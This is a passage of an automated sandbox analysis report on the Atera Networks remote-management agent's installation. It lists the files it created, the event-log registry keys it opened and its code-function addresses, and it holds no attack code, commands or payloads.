                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Windows\System32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\8EC9B1D0ABBD7F98B401D425828828CE_DEB07B5578A606ED6489DDA2E357A944Jump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Windows\System32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\BA74182F76F15A9CF514DEF352303C95Jump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Windows\System32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\C8E534EE129F27D55460CE17FD628216_1130D9B25898B0DB0D4F04DC5B93F141Jump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Windows\System32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F2E248BEDDBB2D85122423C41028BFD4Jump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Windows\System32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\698460A0B6E60F2F602361424D832905_8BB23D43DE574E82F2BEE0DF0EC47EEBJump to dropped file

                                Spam, unwanted Advertisements and Ransom Demands

                                barindex
                                Reads the Security eventlog
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security\AlphaAgent
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security
                                Reads the System eventlog
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System\AlphaAgent
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System\AlphaAgent
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\4c998e.msiJump to behavior
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI9B15.tmpJump to behavior
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIA259.tmpJump to behavior
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIB4E8.tmpJump to behavior
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\inprogressinstallinfo.ipiJump to behavior
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\SourceHash{E732A0D7-A2F2-4657-AC41-B19742648E45}Jump to behavior
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIBB81.tmpJump to behavior
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIBB92.tmpJump to behavior
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIBC4E.tmpJump to behavior
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIBEDF.tmpJump to behavior
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\4c9990.msiJump to behavior
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\4c9990.msiJump to behavior
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSID8C1.tmpJump to behavior
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\4c9991.msiJump to behavior
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIB586.tmpJump to behavior
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIBD86.tmpJump to behavior
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSICBCF.tmpJump to behavior
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\inprogressinstallinfo.ipiJump to behavior
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIDBBE.tmpJump to behavior
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIDBCF.tmpJump to behavior
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIDDD3.tmpJump to behavior
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIDF2C.tmpJump to behavior
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\SourceHash{6B2921FF-79C1-4EBF-81B4-C606D4E5BEF4}Jump to behavior
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI1C9.tmpJump to behavior
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI1CA.tmpJump to behavior
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI3FD.tmpJump to behavior
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI48B.tmpJump to behavior
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\4c999d.msiJump to behavior
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\4c999d.msiJump to behavior
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIAC5.tmpJump to behavior
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\4c999e.msiJump to behavior
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI28DE.tmpJump to behavior
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\inprogressinstallinfo.ipiJump to behavior
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\SourceHash{3FDCF0A2-7C1F-41C7-9749-0D91EC216AED}Jump to behavior
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI2B50.tmpJump to behavior
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\4c99a1.msiJump to behavior
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\4c99a1.msiJump to behavior
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI64A0.tmpJump to behavior
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\4c99a2.msiJump to behavior
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI66C4.tmpJump to behavior
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\inprogressinstallinfo.ipiJump to behavior
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\SourceHash{667CB653-70E1-4E2B-9C8E-6A02A6CF88B9}Jump to behavior
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI6762.tmpJump to behavior
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\4c99a5.msiJump to behavior
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\4c99a5.msiJump to behavior
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI6A60.tmpJump to behavior
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\4c99a6.msiJump to behavior
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI6E49.tmpJump to behavior
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\SourceHash{A09F8381-88C3-44C4-9DAB-AC44F4F4DB4B}Jump to behavior
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI6F54.tmpJump to behavior
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\4c99a9.msiJump to behavior
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\4c99a9.msiJump to behavior
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI7187.tmpJump to behavior
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI72FF.tmpJump to behavior
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\inprogressinstallinfo.ipiJump to behavior
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI7439.tmpJump to behavior
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI7A93.tmpJump to behavior
                                Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\Installer\MSI9B15.tmp-Jump to behavior
                                Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\Installer\MSI9B15.tmp-\AlphaControlAgentInstallation.dllJump to behavior
                                Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\Installer\MSI9B15.tmp-\Microsoft.Deployment.WindowsInstaller.dllJump to behavior
                                Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\Installer\MSI9B15.tmp-\Newtonsoft.Json.dllJump to behavior
                                Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\Installer\MSI9B15.tmp-\System.Management.dllJump to behavior
                                Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\Installer\MSI9B15.tmp-\CustomAction.configJump to behavior
                                Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\Installer\MSIA259.tmp-Jump to behavior
                                Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\Installer\MSIA259.tmp-\AlphaControlAgentInstallation.dllJump to behavior
                                Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\Installer\MSIA259.tmp-\Microsoft.Deployment.WindowsInstaller.dllJump to behavior
                                Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\Installer\MSIA259.tmp-\Newtonsoft.Json.dllJump to behavior
                                Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\Installer\MSIA259.tmp-\System.Management.dllJump to behavior
                                Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\Installer\MSIA259.tmp-\CustomAction.configJump to behavior
                                Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\Installer\MSIB4E8.tmp-
                                Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\Installer\MSIB4E8.tmp-\AlphaControlAgentInstallation.dll
                                Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\Installer\MSIB4E8.tmp-\Microsoft.Deployment.WindowsInstaller.dll
                                Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\Installer\MSIB4E8.tmp-\Newtonsoft.Json.dll
                                Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\Installer\MSIB4E8.tmp-\System.Management.dll
                                Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\Installer\MSIB4E8.tmp-\CustomAction.config
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Windows\system32\InstallUtil.InstallLog
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\698460A0B6E60F2F602361424D832905_8BB23D43DE574E82F2BEE0DF0EC47EEB
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\698460A0B6E60F2F602361424D832905_8BB23D43DE574E82F2BEE0DF0EC47EEB
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\C8E534EE129F27D55460CE17FD628216_1130D9B25898B0DB0D4F04DC5B93F141
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\C8E534EE129F27D55460CE17FD628216_1130D9B25898B0DB0D4F04DC5B93F141
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\8EC9B1D0ABBD7F98B401D425828828CE_DEB07B5578A606ED6489DDA2E357A944
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\8EC9B1D0ABBD7F98B401D425828828CE_DEB07B5578A606ED6489DDA2E357A944
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\BA74182F76F15A9CF514DEF352303C95
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\BA74182F76F15A9CF514DEF352303C95
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\C56C4404C4DEF0DC88E5FCD9F09CB2F1
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\C56C4404C4DEF0DC88E5FCD9F09CB2F1
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F2E248BEDDBB2D85122423C41028BFD4
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F2E248BEDDBB2D85122423C41028BFD4
                                Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\Installer\MSID8C1.tmp-
                                Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\Installer\MSID8C1.tmp-\AlphaControlAgentInstallation.dll
                                Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\Installer\MSID8C1.tmp-\Microsoft.Deployment.WindowsInstaller.dll
                                Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\Installer\MSID8C1.tmp-\Newtonsoft.Json.dll
                                Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\Installer\MSID8C1.tmp-\System.Management.dll
                                Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\Installer\MSID8C1.tmp-\CustomAction.config
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\AgentPackageAgentInformation.exe.log
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\AgentPackageSTRemote.exe.log
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\AgentPackageMonitoring.exe.log
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\AgentPackageUpgradeAgent.exe.log
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\AgentPackageProgramManagement.exe.log
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageInternalPoller\AgentPackageInternalPoller.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\AgentPackageInternalPoller.exe.log
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMarketplace\AgentPackageMarketplace.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\AgentPackageMarketplace.exe.log
                                Source: C:\Windows\System32\msiexec.exeFile deleted: C:\Windows\Installer\MSI9B15.tmpJump to behavior
                                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_3_070700406_3_07070040
                                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_3_04C950B87_3_04C950B8
                                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_3_04C959A87_3_04C959A8
                                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_3_04C94D687_3_04C94D68
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeCode function: 14_2_00007FFAAB560C1D14_2_00007FFAAB560C1D
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeCode function: 14_2_00007FFAAB56C92214_2_00007FFAAB56C922
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeCode function: 14_2_00007FFAAB56BB7614_2_00007FFAAB56BB76
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeCode function: 16_2_00007FFAAB5A1BFE16_2_00007FFAAB5A1BFE
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeCode function: 16_2_00007FFAAB58346616_2_00007FFAAB583466
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeCode function: 16_2_00007FFAAB584C4116_2_00007FFAAB584C41
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeCode function: 16_2_00007FFAAB580C5816_2_00007FFAAB580C58
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeCode function: 16_2_00007FFAAB59D31416_2_00007FFAAB59D314
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeCode function: 16_2_00007FFAAB59E33A16_2_00007FFAAB59E33A
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeCode function: 16_2_00007FFAAB58634D16_2_00007FFAAB58634D
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeCode function: 16_2_00007FFAAB59C9CD16_2_00007FFAAB59C9CD
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeCode function: 16_2_00007FFAAB59C92016_2_00007FFAAB59C920
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeCode function: 16_2_00007FFAAB58CFC816_2_00007FFAAB58CFC8
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeCode function: 16_2_00007FFAAB5A604016_2_00007FFAAB5A6040
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeCode function: 16_2_00007FFAAB58DE2016_2_00007FFAAB58DE20
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeCode function: 16_2_00007FFAAB591CF016_2_00007FFAAB591CF0
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeCode function: 16_2_00007FFAAB589AF216_2_00007FFAAB589AF2
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeCode function: 16_2_00007FFAAB589FD016_2_00007FFAAB589FD0
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeCode function: 16_2_00007FFAAB59CF6816_2_00007FFAAB59CF68
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeCode function: 16_2_00007FFAAB589D6816_2_00007FFAAB589D68
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeCode function: 16_2_00007FFAAB591D5816_2_00007FFAAB591D58
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeCode function: 16_2_00007FFAAB79AC9716_2_00007FFAAB79AC97
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeCode function: 16_2_00007FFAAB7902FA16_2_00007FFAAB7902FA
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeCode function: 16_2_00007FFAAB79E2FA16_2_00007FFAAB79E2FA
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeCode function: 16_2_00007FFAAB79B2AE16_2_00007FFAAB79B2AE
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeCode function: 16_2_00007FFAAB791A1C16_2_00007FFAAB791A1C
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeCode function: 16_2_00007FFAAB79904C16_2_00007FFAAB79904C
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeCode function: 16_2_00007FFAAB7935E016_2_00007FFAAB7935E0
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeCode function: 16_2_00007FFAAB7943DE16_2_00007FFAAB7943DE
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeCode function: 16_2_00007FFAAB79695016_2_00007FFAAB796950
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeCode function: 16_2_00007FFAAB7A0FF216_2_00007FFAAB7A0FF2
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeCode function: 16_2_00007FFAAB7A0F0216_2_00007FFAAB7A0F02
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeCode function: 16_2_00007FFAAB7A0EA616_2_00007FFAAB7A0EA6
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeCode function: 16_2_00007FFAAB7A0D3016_2_00007FFAAB7A0D30
                                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 19_3_0760004019_3_07600040
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeCode function: 20_2_00007FFAAB58047D20_2_00007FFAAB58047D
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeCode function: 20_2_00007FFAAB56FA9420_2_00007FFAAB56FA94
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeCode function: 20_2_00007FFAAB5678D620_2_00007FFAAB5678D6
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeCode function: 20_2_00007FFAAB57100A20_2_00007FFAAB57100A
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeCode function: 20_2_00007FFAAB56868220_2_00007FFAAB568682
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeCode function: 20_2_00007FFAAB5612FB20_2_00007FFAAB5612FB
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeCode function: 20_2_00007FFAAB5710C020_2_00007FFAAB5710C0
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeCode function: 20_2_00007FFAAB56BDB020_2_00007FFAAB56BDB0
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeCode function: 22_2_00007FFAAB57047D22_2_00007FFAAB57047D
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeCode function: 22_2_00007FFAAB55FA9422_2_00007FFAAB55FA94
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeCode function: 22_2_00007FFAAB5610C022_2_00007FFAAB5610C0
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeCode function: 22_2_00007FFAAB5578D622_2_00007FFAAB5578D6
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeCode function: 22_2_00007FFAAB55182822_2_00007FFAAB551828
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeCode function: 22_2_00007FFAAB55868222_2_00007FFAAB558682
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeCode function: 22_2_00007FFAAB5512FB22_2_00007FFAAB5512FB
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeCode function: 24_2_00007FFAAB57182824_2_00007FFAAB571828
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeCode function: 24_2_00007FFAAB5712FB24_2_00007FFAAB5712FB
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeCode function: 26_2_00007FFAAB550C5826_2_00007FFAAB550C58
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeCode function: 26_2_00007FFAAB571FAD26_2_00007FFAAB571FAD
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeCode function: 26_2_00007FFAAB56CEA026_2_00007FFAAB56CEA0
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeCode function: 26_2_00007FFAAB573CD026_2_00007FFAAB573CD0
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeCode function: 26_2_00007FFAAB56CD8026_2_00007FFAAB56CD80
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeCode function: 26_2_00007FFAAB561D8A26_2_00007FFAAB561D8A
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeCode function: 26_2_00007FFAAB56943626_2_00007FFAAB569436
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeCode function: 26_2_00007FFAAB56CE3026_2_00007FFAAB56CE30
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeCode function: 26_2_00007FFAAB7792D026_2_00007FFAAB7792D0
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeCode function: 26_2_00007FFAAB77126E26_2_00007FFAAB77126E
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeCode function: 26_2_00007FFAAB77D15126_2_00007FFAAB77D151
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeCode function: 26_2_00007FFAAB7600BF26_2_00007FFAAB7600BF
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeCode function: 26_2_00007FFAAB77884D26_2_00007FFAAB77884D
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeCode function: 26_2_00007FFAAB77B71926_2_00007FFAAB77B719
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeCode function: 26_2_00007FFAAB769E9D26_2_00007FFAAB769E9D
